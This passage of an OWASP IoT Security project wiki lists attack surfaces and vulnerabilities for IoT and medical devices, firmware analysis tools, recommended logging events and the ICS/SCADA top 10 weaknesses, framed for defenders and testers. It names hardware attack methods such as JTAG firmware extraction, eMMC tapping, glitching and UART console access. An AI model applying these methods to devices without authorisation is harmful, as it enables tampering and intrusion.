** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Verify for old sw versions and possible attacks (Heartbleed, Shellshock, old PHP versions etc)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damage (Physicall)<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to '1234' or '123456' for example.<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented however it is improperly configured or is not being properly updated, e.g. using SSL v2 <br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Storage location for update files is world writable potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* Service can be attacked in a way that denies service to that service or the entire device<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting a OTA update<br />
* Downloading from the manufacturers web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI Flash / eMMC chip and reading it in a adapter<br />
|<br />
* Firmware contains a lot of useful information, like source code and binaries of running services, pre-set passwords, ssh keys etc. <br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With the help of a JTAG adapter and gdb we can modify the execution of firmware in the device and bypass almost all software based security controls.<br />
* Side channel attacks can also modify the execution flow or can be used to leak interesting information from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* By connecting to a serial interface, we will obtain full console access to a device<br />
* Usually security measures include custom bootloaders that prevent the attacker from entering single user mode, but that can also be bypassed.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out of date versions of busybox, openssl, ssh, web servers, etc.<br />
|-<br />
<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping Medical Device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damaging (Physically)<br />
* Failure state analysis<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to get an understanding of the complexity of a modern medical environment<br />
* Allows people to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! <br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines.<br />
* Ensure supported and up-to-date software is used by developers<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file systems for sensitive of interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File: OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum IoT Device logging events. This includes many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA type devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Security Logging Project? ==<br />
<br />
The IoT Secure Logging Project provides a list of core events that should be logged in any IoT-related system. The project exists because IoT systems in general are not logging nearly enough events to constitute input for a solid detection and response program around IoT devices, and for companies that want to do this there are not many good resources for what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= ICS/SCADA =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== ICS/SCADA Project ==<br />
<br />
The OWASP ICS/SCADA Top 10 software weaknesses are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Rank and ID<br />
! Title<br />
|- <br />
| '''1 - CWE-119'''<br />
|<br />
* Improper Restriction of Operations within the Bounds of a Memory Buffer<br />
|- <br />
| '''2 - CWE-20'''<br />
|<br />
* Improper Input Validation<br />
|- <br />
| '''3 - CWE-22'''<br />
|<br />
* Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')<br />
|-<br />
| '''4 - CWE-264'''<br />
|<br />
* Permissions, Privileges, and Access Controls<br />
|- <br />
| '''5 - CWE-200'''<br />
|<br />
* Information Exposure<br />
|- <br />
| '''6 - CWE-255'''<br />
|<br />
* Credentials Management<br />
|- <br />
| '''7 - CWE-287'''<br />
|<br />
* Improper Authentication<br />
|- <br />
| '''8 - CWE-399'''<br />
|<br />
* Resource Management Errors<br />
|- <br />
| '''9 - CWE-79'''<br />
|<br />
* Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')<br />
|- <br />
| '''10 - CWE-189'''<br />
|<br />
* Numeric Errors<br />
|- <br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the ICS/SCADA Project? ==<br />
<br />
The ICS/SCADA Project provides:<br />
<br />
* A list of the Top 10 most dangerous software weaknesses<br />
<br />
== Project Leaders ==<br />
<br />
* NJ Ouchn<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Community =<br />
<br />
[https://www.iamthecavalry.org/ I Am The Cavalry] <br />
<br />
A global grassroots organization that is focused on issues where computer security intersects public safety and human life.<br />
<br />
Their areas of focus include:<br />
* Medical devices<br />
* Automobiles<br />
* Home Electronics<br />
* Public Infrastructure<br />
<br />
[https://otalliance.org Online Trust Alliance]<br />
<br />
Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501c3 charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is global organization supported by over 100 organizations headquartered in Bellevue, Washington with offices in Washington DC.<br />
<br />
Addressing the mounting concerns, in January 2015 the Online Trust Alliance, established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long- term supportability and transfers of ownership of devices and the data collected.<br />
<br />
[https://allseenalliance.org/framework AllSeen Alliance]<br />
<br />
The AllSeen Alliance is a Linux Foundation collaborative project. They're a cross-industry consortium dedicated to enabling the interoperability of billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer, manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, including many other lightweight real-time operating systems.<br />
<br />
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]<br />
<br />
The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.<br />
<br />
[http://securingsmartcities.org/ Securing Smart Cities]<br />
<br />
Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.<br />
<br />
===Talks===<br />
<br />
RSA Conference San Francisco <br> <br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project] <br><br />
Daniel Miessler, Practice Principal <br><br />
April 21, 2015 <br><br />
--- <br><br />
Defcon 23 <br><br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping] <br><br />
Daniel Miessler <br><br />
August 6-9, 2015<br />
